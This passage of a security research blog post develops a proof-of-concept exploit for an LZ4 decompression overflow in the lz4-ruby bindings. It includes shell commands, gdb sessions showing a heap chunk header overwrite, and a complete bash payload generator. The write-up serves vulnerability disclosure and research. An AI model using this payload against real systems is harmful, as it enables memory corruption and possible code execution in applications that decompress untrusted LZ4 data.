Even more amusing is the fact that the size of the output buffer is a part of the header. The header size is defined by the number of bytes at the start of the payload that have the high bit set, plus the one byte that ends the run. This is because Ruby is interpreting this value in the payload as a variable-length Ruby Integer. This means for each byte with the high bit set (0x80) it will presume the subsequent byte in the payload is a part of the integer value to be constructed. This is a very common (but annoying) sequence that anyone familiar with ASN.1/etc will recognize instantly. 
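
A rough Python sketch of that kind of header follows. It assumes the common little-endian base-128 scheme (seven payload bits per byte, least significant group first, high bit meaning "more bytes follow"). I have not confirmed that this is exactly how lz4-ruby decodes its header, so treat the function decode_varint and its byte order as assumptions.

```python
def decode_varint(data):
    """Decode a little-endian base-128 integer from the start of data.
    Returns (value, header_size)."""
    value = 0
    for i, byte in enumerate(data):
        value |= (byte & 0x7F) << (7 * i)
        if byte & 0x80 == 0:       # high bit clear: this was the last byte
            return value, i + 1
    raise ValueError("header runs past the end of the data")


# Four header bytes followed by arbitrary payload bytes.
value, header_size = decode_varint(b"\x80\x81\x82\x7f" + b"rest of payload")
print(value, header_size)
```

With this scheme, three bytes with the high bit set followed by 0x7f describe a buffer of roughly 254 MiB in a four-byte header, which is plenty for a payload that only needs "large enough".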

So, to tell the Ruby bindings how much string memory to allocate, we simply stuff a large integer into the header of our payload. Because I don't really care about this value and just want a large enough buffer for my payload, I threw in some random crap (mostly due - again - to time). 

donb@debian:~/lz4$ printf "\x80\x81\x82\x7f" > ruby_header.lz4
donb@debian:~/lz4$ cat ruby_header.lz4 test.lz4 > ruby.lz4

Unfortunately, this also fails. Why? Because the LZ4_decompress_safe routine does have one extra check that the LZ4_uncompress function Python uses does not have. It validates that the length of the data to be copied does not exceed the size of the input buffer. We exceed it by just a few bytes in my Python payload, which doesn't matter because of the way LZ4 parses the data. But, the check is a small bump in the road, so we want to avoid it. 

To do so, simply create a footer file that gives us ample room to overwrite whatever the heck we want. As a simple example, I just created an 8k file composed of the letter 'x'.

donb@debian:~/lz4$ perl -e 'print "x" x 8192' > footer.lz4


Crashing LZ4_decompress_safe

So, now we can construct the appropriate payload and be on our way. For simplicity, I adjusted my mklz4.sh file to construct the payload "ruby.lz4" by concatenating the header, body, and footer within the script. 

donb@debian:~/lz4$ ./mklz4.sh 
donb@debian:~/lz4$ ruby ./test.rb
ruby lz4 exploit - donb@securitymouse.com
.
.
.
/home/donb/.rvm/gems/ruby-2.1.2/gems/lz4-ruby-0.3.2/lib/lz4-ruby.rb:28: [BUG] Segmentation fault at 0xa5afeff8
ruby 2.1.2p95 (2014-05-08 revision 45877) [i686-linux]

Excellent! That's a great start. Let's spin up gdb and see why we're segfaulting. Now, you might have asked yourself "why did he put the while loop with the sleep in the Ruby script?". Now you'll know. 

Because Ruby loads libraries dynamically based on the 'require' statement, this is just a simple way of breaking in the debugger at a point when all requisite libraries should have been loaded. That way, I can simply break in gdb, adjust my next breakpoint, and be on my way. 

donb@debian:~/lz4$ gdb -q `which ruby`
Reading symbols from /home/donb/.rvm/rubies/ruby-2.1.2/bin/ruby...done.
(gdb) run test.rb
Starting program: /home/donb/.rvm/rubies/ruby-2.1.2/bin/ruby test.rb
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/i386-linux-gnu/i686/cmov/libthread_db.so.1".
[New Thread 0xb7936b70 (LWP 7161)]
ruby lz4 exploit - donb@securitymouse.com
.
.
.
^C
Program received signal SIGINT, Interrupt.
0xb7fe1430 in __kernel_vsyscall ()
(gdb) break LZ4_decompress_safe
Breakpoint 1 at 0xb7d19fc0: file lz4.c, line 850.
(gdb) c
Continuing.

Breakpoint 1, LZ4_decompress_safe (source=source@entry=0xb590800c "\017", dest=0xa5aff008 "", 
    inputSize=inputSize@entry=16851314, maxOutputSize=266371330) at lz4.c:850
850     {
(gdb) 

As you can see above, I simply insert a breakpoint for LZ4_decompress_safe and go on about my business. But, we can notice something is wrong right off the bat. The address in memory passed to the decompression routine as a destination is a bit too "even" for my taste. 

Usually when I see a pointer passed to a function that is a multiple of PAGE_SIZE plus eight bytes, I know I'm in the Linux heap. This is a bad thing because the Linux heap is harder to exploit these days than ever. The only realistic attack that can occur when instrumenting the Linux heap is an attack against the application's logic. And to do this, you'd have to align two pages close together in a predictable way. This requires memory pressure and a lot of other b.s. that I am not going to get into here. 

(gdb) x/8xw dest 
0xa5aff008:     0x00000000      0x00000000      0x00000000      0x00000000
0xa5aff018:     0x00000000      0x00000000      0x00000000      0x00000000
(gdb) x/8xw dest - 8
0xa5aff000:     0x00000000      0x0fe09002      0x00000000      0x00000000
0xa5aff010:     0x00000000      0x00000000      0x00000000      0x00000000
(gdb) x/8xw dest - 16
0xa5afeff8:     Cannot access memory at address 0xa5afeff8
(gdb) 

A few simple tests show that I'm right. Valid memory stops at the start of this page. Since we are using a test application, nothing will be in memory prior to that page. 
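
For anyone who wants to read the 0x0fe09002 word sitting four bytes before dest, here is a small Python sketch. It assumes a 32-bit glibc malloc chunk layout, where the word just before the user pointer is the chunk size with three flag bits packed into the low bits. The helper name decode_size_field is hypothetical.

```python
# Flag bits glibc malloc keeps in the low bits of a chunk's size field
PREV_INUSE = 0x1
IS_MMAPPED = 0x2
NON_MAIN_ARENA = 0x4


def decode_size_field(word):
    """Split a chunk size word into (size_in_bytes, [flag names])."""
    size = word & ~0x7
    names = (("PREV_INUSE", PREV_INUSE),
             ("IS_MMAPPED", IS_MMAPPED),
             ("NON_MAIN_ARENA", NON_MAIN_ARENA))
    flags = [name for name, bit in names if word & bit]
    return size, flags


size, flags = decode_size_field(0x0fe09002)  # word at 0xa5aff004 in gdb
print(hex(size), flags)
print(size % 4096 == 0)          # whole number of pages?
print(size - 8 >= 266371330)     # room for maxOutputSize after the header?
```

Read that way, the chunk is 0x0fe09000 bytes, a whole number of 4k pages, with only the IS_MMAPPED bit set. That fits the picture of a huge allocation that starts on its own page with nothing mapped directly before it.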

So, for fun, let's simply corrupt the header of the heap chunk just to prove we can do it reliably. This may not be useful on Linux, but there are a lot of other platforms where this is useful. Remember, Ruby is a high level language and is implemented on a lot of different platforms. So, depending on your target, Your Mileage May Vary. 

To overwrite just the header and not cause a SIGSEGV by writing to an invalid memory page, just increase the address offset in mklz4.sh by 8 bytes. This will start the copy of our data at the beginning of the heap chunk, rather than 8 bytes prior to the start of the heap chunk's valid page. 
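
The 8 byte adjustment can be checked with a bit of arithmetic. The Python sketch below is my reading of the numbers in the script at the end of this post: a length nibble of 15, then 16843008 bytes of 0xff, then one final byte, plus LZ4's 4-byte minimum match, all accumulated in 32 bits. Treat the model (and the helper names) as assumptions rather than a description of the exact code path in lz4.c.

```python
MINMATCH = 4           # LZ4's minimum match length
MASK32 = 0xFFFFFFFF    # the target is a 32-bit (i686) process


def wrapped_length(ff_count, last_byte):
    """Length field after 32-bit wraparound (assumed accumulation model)."""
    return (15 + 255 * ff_count + last_byte + MINMATCH) & MASK32


def as_signed32(value):
    """Interpret a 32-bit value as a signed offset."""
    return value - (1 << 32) if value & 0x80000000 else value


dest = 0xa5aff008  # destination pointer seen in gdb

for last in (0xdd, 0xe5):  # original byte, then the adjusted one
    length = wrapped_length(16843008, last)
    target = (dest + length) & MASK32
    print(hex(last), hex(length), as_signed32(length), hex(target))
```

With the original 0xdd byte the length wraps to 0xfffffff0, i.e. 16 bytes before dest, which is the 0xa5afeff8 address from the segfault. With 0xe5 it wraps to 0xfffffff8, which lands on 0xa5aff000, the first byte of the chunk header.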

donb@debian:~/lz4$ ./mklz4-ruby.sh 
ruby payload is ready
donb@debian:~/lz4$ !gd
gdb -q `which ruby`
Reading symbols from /home/donb/.rvm/rubies/ruby-2.1.2/bin/ruby...done.
(gdb) run ./test.rb
Starting program: /home/donb/.rvm/rubies/ruby-2.1.2/bin/ruby ./test.rb
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/i386-linux-gnu/i686/cmov/libthread_db.so.1".
[New Thread 0xb7936b70 (LWP 7358)]
ruby lz4 exploit - donb@securitymouse.com
.
.
^C
Program received signal SIGINT, Interrupt.
0xb7fe1430 in __kernel_vsyscall ()
(gdb) break LZ4_decompress_safe
Breakpoint 1 at 0xb7d19fc0: file lz4.c, line 850.
(gdb) c
Continuing.
.
Breakpoint 1, LZ4_decompress_safe (source=source@entry=0xb590800c "\017", dest=0xa5aff008 "", 
    inputSize=inputSize@entry=16851314, maxOutputSize=266371330) at lz4.c:850
850     {
(gdb) x/8xw 0xa5aff000
0xa5aff000:     0x00000000      0x0fe09002      0x00000000      0x00000000
0xa5aff010:     0x00000000      0x00000000      0x00000000      0x00000000
(gdb) where
#0  LZ4_decompress_safe (source=source@entry=0xb590800c "\017", dest=0xa5aff008 "", 
    inputSize=inputSize@entry=16851314, maxOutputSize=266371330) at lz4.c:850
#1  0xb7d1b9ac in LZ4_uncompress_unknownOutputSize (maxOutputSize=<optimized out>, isize=16851314, 
    dest=<optimized out>, source=0xb590800c "\017") at lz4.h:245
#2  lz4internal_uncompress (self=137898400, input=137896980, in_size=33702637, offset=9, 
    out_size=532742661) at lz4ruby.c:151
#3  0xb7ee24ad in call_cfunc_4 (func=0xb7d1b8f0 , recv=137898400, argc=4, 
    argv=0xb793705c) at vm_insnhelper.c:1328
#4  0xb7ee63f7 in vm_call_cfunc_with_frame (th=th@entry=0x804abc8, reg_cfp=reg_cfp@entry=0xb79b6f68, 
    ci=ci@entry=0x83a1af0) at vm_insnhelper.c:1470
#5  0xb7ef55a9 in vm_call_cfunc (ci=0x83a1af0, reg_cfp=0xb79b6f68, th=0x804abc8) at vm_insnhelper.c:1560
#6  vm_call_method (th=0x804abc8, cfp=0xb79b6f68, ci=0x83a1af0) at vm_insnhelper.c:1754
#7  0xb7eec630 in vm_exec_core (th=0x804abc8, initial=initial@entry=0) at insns.def:1028
#8  0xb7ef1672 in vm_exec (th=th@entry=0x804abc8) at vm.c:1304
#9  0xb7ef8d11 in rb_iseq_eval_main (iseqval=iseqval@entry=137109680) at vm.c:1562
#10 0xb7d99489 in ruby_exec_internal (n=0xa5aff008) at eval.c:253
#11 0xb7d9af14 in ruby_exec_node (n=n@entry=0x82c20b0) at eval.c:318
#12 0xb7d9cebc in ruby_run_node (n=0x82c20b0) at eval.c:310
#13 0x08048758 in main (argc=2, argv=0xbffff144) at main.c:36
(gdb) break *0xb7d1b9ac
Breakpoint 2 at 0xb7d1b9ac: file lz4ruby.c, line 152.
(gdb) c
Continuing.
Breakpoint 2, lz4internal_uncompress (self=137898400, input=137896980, in_size=33702637, offset=9, 
    out_size=532742661) at lz4ruby.c:152
152       if (read_bytes < 0) {
(gdb) x/8xw 0xa5aff000
0xa5aff000:     0x082c6fe0      0x44332211      0x75caadde      0x76caadde
0xa5aff010:     0x88776655      0x77caadde      0x78caadde      0x79caadde
(gdb) 


It's easy to see in the output above that we have now successfully overwritten the Linux heap chunk header with our payload data (which is still laid out for the Python exploit, but whatever). 
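
If the byte order makes that hard to eyeball, here is a quick Python check. It takes the first 32 bytes the payload script appends after the "\xf0\x39" token and unpacks them as little-endian 32-bit words, which is how gdb's x/8xw prints memory on i686. The variable names are mine.

```python
import struct

# First eight 4-byte fields appended by the payload script
payload = (b"\xe0\x6f\x2c\x08" b"\x11\x22\x33\x44"
           b"\xde\xad\xca\x75" b"\xde\xad\xca\x76"
           b"\x55\x66\x77\x88" b"\xde\xad\xca\x77"
           b"\xde\xad\xca\x78" b"\xde\xad\xca\x79")

# Words gdb shows at 0xa5aff000 after the decompression call returns
gdb_words = [0x082c6fe0, 0x44332211, 0x75caadde, 0x76caadde,
             0x88776655, 0x77caadde, 0x78caadde, 0x79caadde]

words = list(struct.unpack("<8I", payload))
print([hex(w) for w in words])
print(words == gdb_words)
```

The unpacked words line up one for one with the gdb dump, so the first two words of the chunk (including the size field at 0xa5aff004) now hold attacker-supplied data.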

Summary


This is more proof that LZ4 is a fun algorithm to play with. It's a great and useful compression scheme, but the memory corruption overflow is a lot of fun, too. 

If you end up developing a working Ruby LZ4 payload, please reach out and contact Lab Mouse.

Time's Up. The adjusted Ruby payload script is below.

Don A. Bailey
Lab Mouse Security
Founder / CEO
@InfoSecMouse

#!/bin/bash
#
# Ruby LZ4 payload generator - donb@securitymouse.com
# For Testing Only. Do Not Misuse. 
#

FILE=./test.lz4

append()
{      
        printf "$1" >> "$FILE"
}

init()
{      
        rm -f $FILE
        touch $FILE
}

large()
{      
        x="\"\\xff\" x $1"
        perl -e "print $x" >> $FILE
}

append_size()
{      
        i=0
        while [ $i -lt $1 ]; do
                append $2
                i=$((i+1))
        done
}

# initialize the file
init

# simple literal run; no mask
append "\x0f"

# copy the fifteen bytes and embed a null ref
# the second mask must be embedded here as well
# note that the second mask starts at the first 0xff
append "\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"

# goal was 0xfffffff0 (the \xdd byte below); \xe5 adds 8, giving 0xfffffff8
# now we need (16843008 - 13) 0xff bytes
large 16842995
#append "\xdd"
append "\xe5"

# PyFile_Type technique
# we need 76 bytes but for more than 15 we need a mask
append "\xf0\x39"

# append the ob_type
append "\xe0\x6f\x2c\x08"       # will point to PyFile_Type.file_dealloc()
append "\x11\x22\x33\x44"       # dummy arg for next function
append "\xde\xad\xca\x75"       # f_name
append "\xde\xad\xca\x76"       # f_mode
append "\x55\x66\x77\x88"       # dummy next function address
append "\xde\xad\xca\x77"       # f_softspace
append "\xde\xad\xca\x78"       # f_binary
append "\xde\xad\xca\x79"       # f_buf
append "\xde\xad\xca\x7a"       # f_bufend
append "\x00\x00\x00\x00"       # f_bufptr
append "\x00\x00\x00\x00"       # f_setbuf
append "\x00\x00\x00\x00"       # f_univ_newline
append "\x00\x00\x00\x00"       # f_newlinetypes
append "\x00\x00\x00\x00"       # f_skipnextlf
append "\x00\x00\x00\x00"       # f_encoding
append "\x00\x00\x00\x00"       # f_errors
append "\x00\x00\x00\x00"       # weakreflist
append "\x00\x00\x00\x00"       # unlocked_count

# don't exit with a bad ref here
append "\x00\x00"               # null ref

# last literal run (8192 bytes)
append "\xf0"                   # 15 bytes
large 32                        # (32 * 255)
append "\x11"                   # 17 completes the 8192

printf "\x82\x82\x82\x7f" > ruby_header.lz4
perl -e 'print "x" x 8192' > footer.lz4

echo 'ruby payload is ready'
cat ruby_header.lz4 test.lz4 footer.lz4 > ruby.lz4